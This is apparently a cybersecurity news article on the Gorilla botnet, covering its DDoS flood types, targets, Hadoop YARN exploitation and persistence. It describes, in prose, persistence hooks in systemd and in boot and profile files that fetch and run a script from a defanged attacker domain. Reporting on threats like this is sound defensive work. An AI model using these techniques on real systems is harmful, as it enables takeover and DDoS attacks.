Gorilla Botnet Attacks 100 Countries with More Than 300,000 DDoS Attacks

Gorilla, also known as GorillaBot, is a sophisticated family of botnet malware that has caused havoc worldwide with an increase in distributed denial-of-service (DDoS) assaults. Cybersecurity specialists have discovered this family of malware. Inspired by the Mirai botnet source code leak, this new danger emphasizes how urgently IoT security measures need to be improved.
According to NSFOCUS, a cybersecurity organization, Gorilla launched more than 300,000 assault commands between September 4 and September 27, 2024, identifying the botnet. The malware, which targeted more than 100 nations and industries such as colleges, government websites, telecommunications, banking, gaming, and gambling, averaged at least 20,000 commands every day. Germany, Canada, the United States, and China are the countries most impacted.

Advanced Attack Strategies

Gorilla uses a variety of DDoS tactics, such as SYN flood, ACK flood, VSE flood, ACK BYPASS flood, and UDP flood. It can create large amounts of traffic by spoofing arbitrary source IP addresses by taking advantage of the connectionless feature of the UDP protocol.

The fact that the botnet supports several CPU architectures, such as ARM, MIPS, x86_64, and x86, demonstrates its versatility. Its adaptability in attacking cloud hosts and IoT devices is demonstrated by the fact that it connects to one of five preconfigured command-and-control (C2) servers to receive and carry out attack commands.

Taking advantage of the Apache Hadoop YARN vulnerability

A noteworthy development is that the virus includes the potential to take advantage of a remote code execution vulnerability in Apache Hadoop YARN RPC, which has been extensively abused since 2021. The gorilla’s threat potential is further increased by this, which allows it to access systems without authorization and run arbitrary code.

Strategies for Persistence

By using sophisticated persistence techniques, Gorilla guarantees long-term control over hacked systems. It ensures automatic execution at the system starting by creating a service file called custom.service in the /etc/systemd/system/ directory. It also inserts commands to download and run a shell script (lol.sh) from a remote server (pen.gorillafirewall[.]su) into important files including /etc/inittab, /etc/profile, and /boot/bootcmd.

High-Tech Counter-Detection Techniques

In order to obscure important data, the malware uses encryption algorithms frequently linked to the Keksec group, demonstrating a great degree of counter-detection awareness. This makes Gorilla a serious threat in the changing IoT security environment, especially when paired with its variety of DDoS tactics and persistence strategies.

Researchers’ Points of View

Intriguingly, a security researcher going by the handle Fox_threatintel revealed on X (previously Twitter) that GorillaBot has been in operation for more than a year, defying previous assumptions that it was a recently discovered danger.

This discovery emphasizes how crucial preventative actions are in thwarting botnets and safeguarding IoT ecosystems. GorillaBot’s ability to take down vital infrastructure around the world serves as a sobering reminder of the weaknesses in IoT devices and the urgent need for stronger security measures.